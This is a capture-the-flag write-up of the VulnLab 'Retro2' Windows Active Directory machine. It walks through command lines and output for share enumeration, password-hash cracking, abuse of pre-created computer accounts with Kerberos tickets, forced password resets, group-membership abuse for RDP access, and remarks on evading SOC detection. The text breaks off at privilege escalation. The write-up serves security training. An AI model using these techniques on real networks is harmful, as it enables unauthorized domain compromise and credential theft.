POSTS

VULNLAB: Retro2

Retro2 is an easy difficulty Windows machine, which highlights AD exploitation. Initial external enumeration reveals a publicly accessible SMB Share containing a Microsoft Access Database file, which is password protected. After cracking the password, the contents of the accdb file are accessible, enabling the retrieval of the VBA script inside, where AD credentials can be retrieved. Then, by abusing pre-created computer accounts , we gain access to a computer account with the GenericWrite privilege over another account, which, when leveraged, provides access to the system via RDP . Finally, exploiting the RpcEptMapper registry key results in privilege escalation to a system account.

VULNLAB: Retro2
3420 words · 17 min

Overview

  • Type Machines
  • OS Windows
  • Severity Easy
  • Creator xct
  • Release date 2024 Aug 22

Enumeration

Start the instance via Discord and let’s go:

image

10.10.127.72

Nmap

$ nmap -sT -v -T4 -p 22,53,80,88,443,8080,3128,135,139,445,389,636,5985,3389 --open -Pn 10.10.127.72

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
636/tcp  open  ldapssl
3389/tcp open  ms-wbt-server

Found open ports: DNS, SMB, LDAP, RPC and RDP. No Web service.

$ nmap -sCV -T4 -p 3389 --open -Pn 10.10.127.72

PORT     STATE SERVICE            VERSION
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2024-09-23T01:03:02+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2024-08-16T11:25:28
|_Not valid after:  2025-02-15T11:25:28
| rdp-ntlm-info: 
|   Target_Name: RETRO2
|   NetBIOS_Domain_Name: RETRO2
|   NetBIOS_Computer_Name: BLN01
|   DNS_Domain_Name: retro2.vl
|   DNS_Computer_Name: BLN01.retro2.vl
|   Product_Version: 6.1.7601
|_  System_Time: 2024-09-23T01:02:57+00:00

Add BLN01.retro2.vl in in /etc/hosts

Shared folder (445/tcp)

List shared folders using the guest account:

$ nxc smb BLN01.retro2.vl -u 'guest' -p '' --shares                                                 
SMB         10.10.127.72    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.127.72    445    BLN01            [+] retro2.vl\guest: 
SMB         10.10.127.72    445    BLN01            [*] Enumerated shares
SMB         10.10.127.72    445    BLN01            Share           Permissions     Remark
SMB         10.10.127.72    445    BLN01            -----           -----------     ------
SMB         10.10.127.72    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.127.72    445    BLN01            C$                              Default share
SMB         10.10.127.72    445    BLN01            IPC$                            Remote IPC
SMB         10.10.127.72    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.127.72    445    BLN01            Public          READ            
SMB         10.10.127.72    445    BLN01            SYSVOL                          Logon server share

Found Public with read access and the server is Windows Server 2008 R2 so pretty old and EOL/EOS since January 14th, 2020.

Check the content of Public folder:

$ nxc smb BLN01.retro2.vl -u 'guest' -p '' -M spider_plus  

SMB         10.10.127.72    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.127.72    445    BLN01            [+] retro2.vl\guest: 
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.127.72    445    BLN01            [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.127.72    445    BLN01            [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.127.72    445    BLN01            [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.127.72    445    BLN01            [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.127.72    445    BLN01            [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.127.72    445    BLN01            [*] Enumerated shares
SMB         10.10.127.72    445    BLN01            Share           Permissions     Remark
SMB         10.10.127.72    445    BLN01            -----           -----------     ------
SMB         10.10.127.72    445    BLN01            ADMIN$                          Remote Admin
SMB         10.10.127.72    445    BLN01            C$                              Default share
SMB         10.10.127.72    445    BLN01            IPC$                            Remote IPC
SMB         10.10.127.72    445    BLN01            NETLOGON                        Logon server share 
SMB         10.10.127.72    445    BLN01            Public          READ            
SMB         10.10.127.72    445    BLN01            SYSVOL                          Logon server share 
SPIDER_PLUS 10.10.127.72    445    BLN01            [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.127.72.json".
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] SMB Shares:           6 (ADMIN$, C$, IPC$, NETLOGON, Public, SYSVOL)
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] SMB Readable Shares:  1 (Public)
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] Total folders found:  2
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] Total files found:    1
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] File size average:    856 KB
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] File size min:        856 KB
SPIDER_PLUS 10.10.127.72    445    BLN01            [*] File size max:        856 KB
$ cat /tmp/nxc_hosted/nxc_spider_plus/10.10.127.72.json
{
    "Public": {
        "DB/staff.accdb": {
            "atime_epoch": "2024-08-17 21:07:06",
            "ctime_epoch": "2024-08-17 21:06:49",
            "mtime_epoch": "2024-08-17 23:30:34",
            "size": "856 KB"
        }
    }
}

Download DB/staff.accdb:

$ smbmap -H BLN01.retro2.vl -u guest -p '' --download 'Public/DB/staff.accdb'
/usr/lib/python3/dist-packages/smbmap/smbmap.py:441: SyntaxWarning: invalid escape sequence '\p'
  stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % remoteName

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Public\DB\staff.accdb (876544 bytes)                                                              
[+] File output to: /home/user/Downloads/VULNLAB/RETRO2/10.10.127.72-Public_DB_staff.accdb                               
[*] Closed 1 connections

Quick check the file:

$ mv 10.10.127.72-Public_DB_staff.accdb staff.accdb
$ file staff.accdb 
staff.accdb: Microsoft Access Database

Ok so it’s a MS Access DB

Try to open it online via MDBViewer:

image

Seems protected by password

MS Access DB cracking

Get the hash via office2john:

$ office2john staff.accdb             
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235

Then crack it with Hashcat:

$ hashcat -a 0 -m 9600 '$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235' /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
...
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08

Found class08

Then we try to open it using MDB Viewer Plus or LibreOffice + UCanAccess but failed.

In most positive result, I can just found an empty database:

image

So open it with a trial version of MS Access and found that contains a VBA with credentials:

2

1

Found retro2\ldapreader:ppYaVcB5R

Update /etc/hosts as relaunch an instance:

image

Check if the account is valid:

$ nxc smb BLN01.retro2.vl -u 'ldapreader' -p 'ppYaVcB5R'                       
SMB         10.10.85.108    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.85.108    445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R

Ok

AD Enumeration

Users enumeration by Bruteforcing RID

$ nxc smb BLN01.retro2.vl -u 'ldapreader' -p 'ppYaVcB5R' --rid-brute
SMB         10.10.85.108    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.85.108    445    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
SMB         10.10.85.108    445    BLN01            498: RETRO2\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            500: RETRO2\Administrator (SidTypeUser)
SMB         10.10.85.108    445    BLN01            501: RETRO2\Guest (SidTypeUser)
SMB         10.10.85.108    445    BLN01            502: RETRO2\krbtgt (SidTypeUser)
SMB         10.10.85.108    445    BLN01            512: RETRO2\Domain Admins (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            513: RETRO2\Domain Users (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            514: RETRO2\Domain Guests (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            515: RETRO2\Domain Computers (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            516: RETRO2\Domain Controllers (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            517: RETRO2\Cert Publishers (SidTypeAlias)
SMB         10.10.85.108    445    BLN01            518: RETRO2\Schema Admins (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            519: RETRO2\Enterprise Admins (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            520: RETRO2\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            521: RETRO2\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            553: RETRO2\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.85.108    445    BLN01            571: RETRO2\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.85.108    445    BLN01            572: RETRO2\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.85.108    445    BLN01            1000: RETRO2\admin (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1001: RETRO2\BLN01$ (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1102: RETRO2\DnsAdmins (SidTypeAlias)
SMB         10.10.85.108    445    BLN01            1103: RETRO2\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            1104: RETRO2\staff (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            1105: RETRO2\Julie.Martin (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1106: RETRO2\Clare.Smith (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1107: RETRO2\Laura.Davies (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1108: RETRO2\Rhys.Richards (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1109: RETRO2\Leah.Robinson (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1110: RETRO2\Michelle.Bird (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1111: RETRO2\Kayleigh.Stephenson (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1112: RETRO2\Charles.Singh (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1113: RETRO2\Sam.Humphreys (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1114: RETRO2\Margaret.Austin (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1115: RETRO2\Caroline.James (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1116: RETRO2\Lynda.Giles (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1117: RETRO2\Emily.Price (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1118: RETRO2\Lynne.Dennis (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1119: RETRO2\Alexandra.Black (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1120: RETRO2\Alex.Scott (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1121: RETRO2\Mandy.Davies (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1122: RETRO2\Marilyn.Whitehouse (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1123: RETRO2\Lindsey.Harrison (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1124: RETRO2\Sally.Davey (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1127: RETRO2\ADMWS01$ (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1128: RETRO2\inventory (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1129: RETRO2\services (SidTypeGroup)
SMB         10.10.85.108    445    BLN01            1130: RETRO2\ldapreader (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1131: RETRO2\FS01$ (SidTypeUser)
SMB         10.10.85.108    445    BLN01            1132: RETRO2\FS02$ (SidTypeUser)

BloodHound

$ nxc ldap BLN01.retro2.vl -u 'ldapreader' -p 'ppYaVcB5R' -d retro2.vl --dns-server 10.10.85.108 --dns-tcp --dns-timeout 10 --bloodhound --collection All

SMB         10.10.85.108    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
LDAP        10.10.85.108    389    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
LDAP        10.10.85.108    389    BLN01            Resolved collection methods: container, localadmin, psremote, trusts, objectprops, dcom, rdp, acl, session, group
LDAP        10.10.85.108    389    BLN01            Done in 00M 50S
LDAP        10.10.85.108    389    BLN01            Compressing output into /home/user/.nxc/logs/BLN01_10.10.85.108_2024-09-23_192457_bloodhound.zip

OR

$ bloodhound-python -u 'ldapreader' -p 'ppYaVcB5R' -d retro2.vl -c all -ns 10.10.124.253 --dns-tcp --dns-timeout 10 -dc BLN01.retro2.vl --zip

INFO: Found AD domain: retro2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: BLN01.retro2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: BLN01.retro2.vl
INFO: Found 27 users
INFO: Found 43 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: BLN01.retro2.vl
INFO: Querying computer: 
INFO: Done in 00M 55S
INFO: Compressing output into 20240924200425_bloodhound.zip

If first time we use BloodHound Community Edition. then follow the step below to install it (better with Docker Desktop, but if under VMWare then not possible to do it because if Hypervisor limitation):

sudo apt update
sudo apt install ca-certificates curl
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/debian/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
  • Add the repository to Apt sources (for derivative distro, such as Kali Linux):
echo \
  "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/debian \
  bookworm stable" | \
  sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
  • Install the Docker packages:
$ sudo apt install docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin
  • Download the Docker Compose YAML file and save it to a directory where you’d like to run BHCE:
$ mkdir BloodHound
$ cd BloodHound 
$ curl -L https://ghst.ly/getbhce > ./docker-compose.yml
  • Navigate to the folder with the saved docker-compose.yaml file and run docker compose pull && docker compose up:
$ sudo docker compose pull && sudo docker compose up
  • Locate the randomly generated password in the terminal output of Docker Compose:
...
bloodhound-1  | {"level":"info","time":"2024-09-23T12:19:16.139785501Z","message":"###################################################################"}
bloodhound-1  | {"level":"info","time":"2024-09-23T12:19:16.139799597Z","message":"#                                                                 #"}
bloodhound-1  | {"level":"info","time":"2024-09-23T12:19:16.139801Z","message":"# Initial Password Set To:    U0mGscmOwmISiart4iJ6wBjOhIKRnVzn    #"}
bloodhound-1  | {"level":"info","time":"2024-09-23T12:19:16.139802042Z","message":"#                                                                 #"}
bloodhound-1  | {"level":"info","time":"2024-09-23T12:19:16.139803034Z","message":"###################################################################"}
...
  • In a browser, navigate to http://localhost:8080/ui/login.
    • Login with the username admin and the randomly generated password from the logs (then change the password during the first login):

image

image

Then ingest our collector file:

image

image

Then we can start AD analysis.

Check our ldapreader user:

image

Just a domain user

Domain admins:

image

Shortest path to Domain Admins:

image

Domain computers:

image

Any member of Domain Computers group has GenericWrite permission over each member (example: FS01 –> GenericWrite –> FS02)

image

ADMWS01 has AddSelf and AddMemberpermissions over SERVICES group

Important
  • The computer ADMWS01.RETRO2.VL has the ability to add itself, to the group SERVICES@RETRO2.VL.
  • Because of security group delegation, the members of a security group have the same privileges as that group.
  • By adding itself to the group, ADMWS01.RETRO2.VL will gain the same privileges that SERVICES@RETRO2.VL already has.
  • It can add also any other account to the group SERVICES@RETRO2.VL as it has the AddMember permission too.

image

SERVICES group is member of REMOTE DESKTOP USERS group. Members in this group are granted the right to logon remotely

image

BLN01 is a Domain Controller and an Ennterprise Domain Controller

Important
  • The members of the group DOMAIN CONTROLLERS@RETRO2.VL have the DS-Replication-Get-Changes-All permission on the domain RETRO2.VL.
  • Individually, this edge does not grant the ability to perform an attack.
  • However, in conjunction with DS-Replication-Get-Changes, a principal may perform a DCSync attack.

Attack path to pwn the domain:

  • Access to a computer object FS01 or FS02
  • Take the control of ADMWS01
  • Add ADMWS01 to SERVICES group
  • RDP to BLN01
  • Take over BLN01
  • DCSync of RETRO2.VL

User path

Pre-Created Computer abusing (FS01$)

Finding computer accounts that have been “pre-created” (i.e. manually created in ADUC instead of automatically added when joining a machine to the domain), but have never been used can be done by filtering the UserAccountControl attribute of all computer accounts and look for the value 4128 (32|4096) (deductible via the UserAccountControl flags).

We use Netexec with a LDAP query to find pre-created accounts that never logged on:

$ nxc ldap BLN01.retro2.vl -u 'ldapreader' -p 'ppYaVcB5R' --query '(&(userAccountControl=4128)(logonCount=0))' ""                                        

SMB         10.10.71.51     445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
LDAP        10.10.71.51     389    BLN01            [+] retro2.vl\ldapreader:ppYaVcB5R 
LDAP        10.10.71.51     389    BLN01            [+] Response for object: CN=FS01,CN=Computers,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            objectClass:         top person organizationalPerson user computer
LDAP        10.10.71.51     389    BLN01            cn:                  FS01
LDAP        10.10.71.51     389    BLN01            distinguishedName:   CN=FS01,CN=Computers,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            instanceType:        4
LDAP        10.10.71.51     389    BLN01            whenCreated:         20240817142422.0Z
LDAP        10.10.71.51     389    BLN01            whenChanged:         20240817142521.0Z
LDAP        10.10.71.51     389    BLN01            uSNCreated:          28707
LDAP        10.10.71.51     389    BLN01            uSNChanged:          28720
LDAP        10.10.71.51     389    BLN01            name:                FS01
LDAP        10.10.71.51     389    BLN01            objectGUID:          0x25254a4eaa341a44bcfe157ef38de85a
LDAP        10.10.71.51     389    BLN01            userAccountControl:  4128
LDAP        10.10.71.51     389    BLN01            badPwdCount:         0
LDAP        10.10.71.51     389    BLN01            codePage:            0
LDAP        10.10.71.51     389    BLN01            countryCode:         0
LDAP        10.10.71.51     389    BLN01            badPasswordTime:     0
LDAP        10.10.71.51     389    BLN01            lastLogoff:          0
LDAP        10.10.71.51     389    BLN01            lastLogon:           0
LDAP        10.10.71.51     389    BLN01            localPolicyFlags:    0
LDAP        10.10.71.51     389    BLN01            pwdLastSet:          133683782621620337
LDAP        10.10.71.51     389    BLN01            primaryGroupID:      515
LDAP        10.10.71.51     389    BLN01            objectSid:           0x010500000000000515000000f3be9d5f11b20e3ec26f0ead6b040000
LDAP        10.10.71.51     389    BLN01            accountExpires:      9223372036854775807
LDAP        10.10.71.51     389    BLN01            logonCount:          0
LDAP        10.10.71.51     389    BLN01            sAMAccountName:      FS01$
LDAP        10.10.71.51     389    BLN01            sAMAccountType:      805306369
LDAP        10.10.71.51     389    BLN01            objectCategory:      CN=Computer,CN=Schema,CN=Configuration,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            isCriticalSystemObject: FALSE
LDAP        10.10.71.51     389    BLN01            dSCorePropagationData: 20240817142521.0Z 16010101000000.0Z
LDAP        10.10.71.51     389    BLN01            [+] Response for object: CN=FS02,CN=Computers,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            objectClass:         top person organizationalPerson user computer
LDAP        10.10.71.51     389    BLN01            cn:                  FS02
LDAP        10.10.71.51     389    BLN01            distinguishedName:   CN=FS02,CN=Computers,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            instanceType:        4
LDAP        10.10.71.51     389    BLN01            whenCreated:         20240817142437.0Z
LDAP        10.10.71.51     389    BLN01            whenChanged:         20240817142538.0Z
LDAP        10.10.71.51     389    BLN01            uSNCreated:          28713
LDAP        10.10.71.51     389    BLN01            uSNChanged:          28721
LDAP        10.10.71.51     389    BLN01            name:                FS02
LDAP        10.10.71.51     389    BLN01            objectGUID:          0x279f7f94f327ca478348d1895651361a
LDAP        10.10.71.51     389    BLN01            userAccountControl:  4128
LDAP        10.10.71.51     389    BLN01            badPwdCount:         0
LDAP        10.10.71.51     389    BLN01            codePage:            0
LDAP        10.10.71.51     389    BLN01            countryCode:         0
LDAP        10.10.71.51     389    BLN01            badPasswordTime:     0
LDAP        10.10.71.51     389    BLN01            lastLogoff:          0
LDAP        10.10.71.51     389    BLN01            lastLogon:           0
LDAP        10.10.71.51     389    BLN01            localPolicyFlags:    0
LDAP        10.10.71.51     389    BLN01            pwdLastSet:          133683782775592607
LDAP        10.10.71.51     389    BLN01            primaryGroupID:      515
LDAP        10.10.71.51     389    BLN01            objectSid:           0x010500000000000515000000f3be9d5f11b20e3ec26f0ead6c040000
LDAP        10.10.71.51     389    BLN01            accountExpires:      9223372036854775807
LDAP        10.10.71.51     389    BLN01            logonCount:          0
LDAP        10.10.71.51     389    BLN01            sAMAccountName:      FS02$
LDAP        10.10.71.51     389    BLN01            sAMAccountType:      805306369
LDAP        10.10.71.51     389    BLN01            objectCategory:      CN=Computer,CN=Schema,CN=Configuration,DC=retro2,DC=vl
LDAP        10.10.71.51     389    BLN01            isCriticalSystemObject: FALSE
LDAP        10.10.71.51     389    BLN01            dSCorePropagationData: 20240817142538.0Z 16010101000000.0Z

Found that FS01$ and FS02$ are Pre-Created Computer account

Test if we see the error message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when guess the correct password (same than the cn in lowercase) for a computer account that has not been used yet:

$ nxc smb BLN01.retro2.vl -u 'fs02$' -p 'fs02' --no-bruteforce
SMB         10.10.71.51     445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.71.51     445    BLN01            [-] retro2.vl\fs02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 

$ nxc smb BLN01.retro2.vl -u 'fs01$' -p 'fs01' --no-bruteforce
SMB         10.10.71.51     445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.71.51     445    BLN01            [-] retro2.vl\fs01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 

Confirmed

The legacy way is to change the Pre-Windows 2000 computer accounts’ password using rpcchangepwd.py or kpasswd.py, etc.) in order to use it.

But for OPSec it’s not good to do like that as we have a trace in eventlog or we can trigger an alert then SOC can be focus on us.

We are able to authenticate using Kerberos without having to change the account’s password and we will follow this way.

  • Filip Dragovic’s tweet: source

Add retro2.vl in /etc/hosts

Get the ticket of FS01$ (or ‘FS02$’):

$ impacket-getTGT retro2.vl/fs01\$:fs01
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in fs01$.ccache

Export the credential cache to set our Kerberos authentication global variable to be directed to this ticket:

$ export KRB5CCNAME=fs01\$.ccache

Double check:

$ klist
Ticket cache: FILE:fs01$.ccache
Default principal: fs01$@RETRO2.VL

Valid starting     Expires            Service principal
09/25/24 17:32:29  09/26/24 03:32:29  krbtgt/RETRO2.VL@RETRO2.VL
	renew until 09/26/24 17:32:30
Tip
  • When using the option -k, we need to specify the same hostname (FQDN) as the one from the kerberos ticket !!!

We pass the ticket to authenticate:

$ impacket-smbclient -k -no-pass retro2.vl/fs01\$@BLN01.retro2.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# exit

Same to obtain the users list:

$ nxc smb retro2.vl -k --kdcHost bln01.retro2.vl --users 
SMB         retro2.vl       445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         retro2.vl       445    BLN01            -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         retro2.vl       445    BLN01            Administrator                 2024-08-17 11:21:50 0       Built-in account for administering the computer/domain 
SMB         retro2.vl       445    BLN01            Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         retro2.vl       445    BLN01            krbtgt                        2024-08-17 11:24:49 0       Key Distribution Center Service Account 
SMB         retro2.vl       445    BLN01            admin                         2024-08-17 11:47:52 0        
SMB         retro2.vl       445    BLN01            Julie.Martin                  2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Clare.Smith                   2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Laura.Davies                  2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Rhys.Richards                 2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Leah.Robinson                 2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Michelle.Bird                 2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Kayleigh.Stephenson           2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Charles.Singh                 2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Sam.Humphreys                 2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Margaret.Austin               2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Caroline.James                2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Lynda.Giles                   2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Emily.Price                   2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Lynne.Dennis                  2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Alexandra.Black               2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Alex.Scott                    2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Mandy.Davies                  2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Marilyn.Whitehouse            2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Lindsey.Harrison              2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            Sally.Davey                   2024-08-17 11:35:40 0        
SMB         retro2.vl       445    BLN01            inventory                     2024-08-17 11:43:29 0        
SMB         retro2.vl       445    BLN01            ldapreader                    2024-08-17 12:03:28 0        
SMB         retro2.vl       445    BLN01            [*] Enumerated 26 local users: RETRO2

GenericWrite permission abusing (ADMWS01$)

We have tampered FS01$ then we have GenericWrite over ADMWS01$.

But BLN01 is a Windows Server 2008 so the standard ways to abuse GenericWrite as below don’t work:

  • Resource-Based Constrained Delegation (RBCD)
  • shadowCredentials

Challenge???

With old system like this, we can write to the unicodePwd attribute, that allows us to reset the password of ADMWS01$ (But bye bye our OPSec).

$ bloodyAD --host bln01.retro2.vl --dc-ip 10.10.71.51 -d retro2.vl -u 'fs01$' -k set password 'ADMWS01$' 'Qwerty1234!'
[+] Password changed successfully!

We can use also some standard tool/command as rpcclient or net rpc password to change the password.

Double check:

$ nxc smb bln01.retro2.vl -u 'ADMWS01$' -p 'Qwerty1234!'             
SMB         10.10.71.51     445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True)
SMB         10.10.71.51     445    BLN01            [+] retro2.vl\ADMWS01$:Qwerty1234! 

Confirmed we pwned ADMWS01$

AddMember permission abusing (Retro2_User)

Now we use the AddMember permission of ADMSW01$ over SERVICES group to add our LDAPREADER account to the SERVICES group:

$ bloodyAD --host bln01.retro2.vl --dc-ip 10.10.71.51 -d retro2.vl -u 'ADMWS01$' -p 'Qwerty1234!' add groupMember 'SERVICES' 'ldapreader'
[+] ldapreader added to SERVICES

Now our ldapreader account can RDP to the Domain Controller.

Using Remmina;

image

We received a TLS error then need to disable it:

image

Then we can connect:

image

Desktop folder of ldapreader does not contain any flag:

image

But we found the Retro2_User flag in the root of C:\

image

image

Found VL{3998adcb0ca6911b51cbf6492b365653}

Root path

RpcEptMapper registry key permissions exploiting (Retro2_Root)

Set a local web server:

$ python3 -m http.server 80

Then upload WinPEAS to the target to check privilege escalation:

Microsoft Windows [Version 6.1.7601]
